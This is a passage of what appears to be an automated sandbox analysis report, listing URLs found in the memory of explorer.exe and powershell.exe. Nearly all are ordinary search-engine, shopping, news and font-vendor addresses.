Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000019.00000002.376358295.000001D99DE41000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: ~DF86A9972C2BDD16F4.TMP.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364212205.000000000E8C0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000021.00000000.364212205.000000000E8C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.377538571.000001D99E051000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000021.00000000.358808752.0000000008B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000021.00000000.364453338.000000000E9B3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
